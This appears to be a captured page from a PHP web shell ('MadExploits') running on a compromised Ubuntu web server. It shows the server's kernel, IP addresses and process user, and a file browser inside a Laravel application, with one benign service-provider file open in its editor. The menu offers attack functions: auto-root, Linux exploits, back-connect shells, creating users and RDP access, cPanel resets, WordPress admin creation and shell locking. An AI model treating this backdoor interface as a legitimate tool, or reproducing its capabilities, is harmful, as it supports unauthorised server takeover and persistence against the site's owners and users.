Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms-auth /
app /
Modules /
User /
Providers /
[ HOME SHELL ]
Name
Size
Permission
Action
.gitkeep
0
B
-rw-rw-r--
RouteServiceProvider.php
1.18
KB
-rw-rw-r--
UserServiceProvider.php
2.08
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : UserServiceProvider.php
<?php namespace App\Modules\User\Providers; use Illuminate\Support\ServiceProvider; use App\Modules\User\Repositories\UserInterface; use App\Modules\User\Repositories\UserRepository; class UserServiceProvider extends ServiceProvider { /** * @var string $moduleName */ protected $moduleName = 'User'; /** * @var string $moduleNameLower */ protected $moduleNameLower = 'user'; /** * Boot the application events. * * @return void */ public function boot() { $this->registerTranslations(); $this->registerConfig(); $this->loadMigrationsFrom(module_path($this->moduleName, 'Database/Migrations')); } /** * Register the service provider. * * @return void */ public function register() { $this->app->register(RouteServiceProvider::class); $this->registerUser(); } /** * Register user. * * @return void */ public function registerUser() { $this->app->bind(UserInterface::class, UserRepository::class); } /** * Register config. * * @return void */ protected function registerConfig() { $this->publishes([ module_path($this->moduleName, 'Config/config.php') => config_path($this->moduleNameLower . '.php'), ], 'config'); $this->mergeConfigFrom( module_path($this->moduleName, 'Config/config.php'), $this->moduleNameLower ); } /** * Register translations. * * @return void */ public function registerTranslations() { $langPath = resource_path('lang/modules/' . $this->moduleNameLower); if (is_dir($langPath)) { $this->loadTranslationsFrom($langPath, $this->moduleNameLower); } else { $this->loadTranslationsFrom(module_path($this->moduleName, 'Resources/lang'), $this->moduleNameLower); } } /** * Get the services provided by the provider. * * @return array */ public function provides() { return []; } }
Close